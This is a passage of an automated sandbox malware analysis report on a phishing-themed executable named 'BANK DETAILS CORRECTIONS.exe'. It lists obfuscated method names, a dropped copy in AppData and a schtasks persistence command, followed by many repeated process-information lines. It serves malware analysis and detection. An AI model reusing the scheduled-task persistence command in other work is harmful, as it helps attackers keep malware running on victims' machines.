                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, lIpPJ8WMDhjobULOpe.csHigh entropy of concatenated method names: 'RHJPlKxwrO', 'GCqPy6XpsY', 'lfrPudfy3g', 'Tl3PIgWPYt', 'FRhP2N8rko', 'j9dPYH3unI', 'Q2hPwxaomK', 'KBfPRVlrLM', 'vWPjnSbhqhGc0xAMmlY', 'D6g6gEb7GGi6LLB8D4K'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, kNmsS0KwVwTBc9gu2d.csHigh entropy of concatenated method names: 'iBBha6ZBG6', 'sYshwVKNyR', 'PrnhLKeFge', 'mZEh7g34Rq', 'XgChWfy86h', 'W7WhDj4LSP', 'hOHhmgYbEf', 'PPRhk7SPQw', 'uEIh9BPucu', 'o1uheiRwue'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, Y5i6UvwKpce67ZwFXg.csHigh entropy of concatenated method names: 'fKijINmgS7', 'J8bj2wigDS', 'PJhjaZqBhA', 'uWpjwOwrrX', 'o5ujNHaZX0', 'PIMjOvlNae', 'RwWj3MPIF3', 'gnZj4D8nw1', 'trfjMXxBwb', 'UF7jCFKMT8'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, zkZxIGU8FXukaMxFsYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vrNCFvDmu1', 'UwECH36clI', 'gG3CXx5ORb', 'V7fCimQbwL', 'a3TCdlVqtS', 'ay3C5hBJbZ', 'SbACsja15L'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, eY2qJaimXSGow5DTwb.csHigh entropy of concatenated method names: 'XAi3fO9gR8', 'Yhw3VXTGMO', 'ToString', 'I8G3T1fS3E', 'Djl3Qd9ust', 'QS33jR5ARB', 'c4Z3q5hNYX', 'z4G3PXxxvw', 'baQ3gybulI', 'FRu30rb9pR'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, C6DfDTZCXSi0UbmT5J.csHigh entropy of concatenated method names: 'UNg4L2axuh', 'a1847dLF7q', 'Lx546eIrQN', 'sCX4W7umGD', 'j194Fyu63b', 'Iy84D7U7Bk', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, sHDcKABKKVrFxJInf4.csHigh entropy of concatenated method names: 'HIlMUZOIph', 'fvbM8C7doV', 'WmKMrlUuQu', 'koRMT1cYQF', 'C0NMQKjhKD', 'UWLMq1RqqK', 'nXRMPyHgwU', 'Upg4sG229F', 'VX04JTfd68', 'l4J4ZCHBcN'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, OwIOThAf7ZaP1hFQg0.csHigh entropy of concatenated method names: 'gSCuHptTN', 'uRPIQfPph', 'mAv2rFl3M', 'vSAY2XJxL', 'b5Xw0gZKm', 'us5RKKQOc', 'kIjA9blJxRok7EK24L', 'VoZeSJ1hNLMEl8Lfwx', 'oq74Ue4VJ', 'LEcC3icxS'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, TAQxmwJtyBvqQpMdNN.csHigh entropy of concatenated method names: 'hCP4TJYgi5', 'Iay4Q8naDZ', 'qYb4jAQ6fl', 'O0A4q5fCGn', 'PdP4PW1QaJ', 'CvR4g9C3oI', 'McZ40ElrxB', 'mUS4cm6eZr', 'CDf4fATbwr', 'Yh04Vt0p1N'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, WIZChgQigwGrZrhkVl.csHigh entropy of concatenated method names: 'Dispose', 'KpBUZ1W8nU', 'odQA7VM81H', 'aXw449TYvv', 'MiAUBQxmwt', 'xBvUzqQpMd', 'ProcessDialogKey', 'oNYAS6DfDT', 'tXSAUi0Ubm', 'f5JAACHDcK'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.csHigh entropy of concatenated method names: 'mbl8top0Cw', 'gaB8TQESAl', 'T6N8Qvi0rX', 'r4T8jqlmEV', 'CP78qSC7kM', 'qBA8PmrOiQ', 'ile8gCpbAB', 'cbM802eaVH', 'kAL8cOY0ja', 'IjJ8fLeGDx'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, zlkrqTUSCeJO6SjsTBn.csHigh entropy of concatenated method names: 'sXGMyQM1nd', 'ClqMGtMjA2', 'b95MuetAx3', 'PyJMIUuqSi', 'mwOMbcbDFG', 'awnM26Zfrs', 'To8MYWa83J', 'AuTMaZSmZg', 'uBmMwtSUSB', 'N9HMRFgaB5'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, OectpLryIkurccAY12.csHigh entropy of concatenated method names: 'cQTUge1LJP', 'Jf5U0VFXiQ', 'MKpUfce67Z', 'EFXUVgPBSj', 'GcTUNSO9DG', 'OpIUOwqTm6', 'vjxVdY2JUkSAmoCshy', 'McOGQ73DKphXvybRTN', 'I28UUn4qqB', 'j4rU8293Ih'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, k2HUP0FNHjHWySwOx9.csHigh entropy of concatenated method names: 'SnkN98wOjd', 'TYHNossVpf', 'G1FNFnbYXq', 'hGsNH4s6Vm', 'cNrN7rHAdY', 'MCRN6NvH9s', 'JhcNWfYYfA', 'AyyND7lQJ4', 'bQCNpYZSdm', 'NpgNmq7ypl'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeFile created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
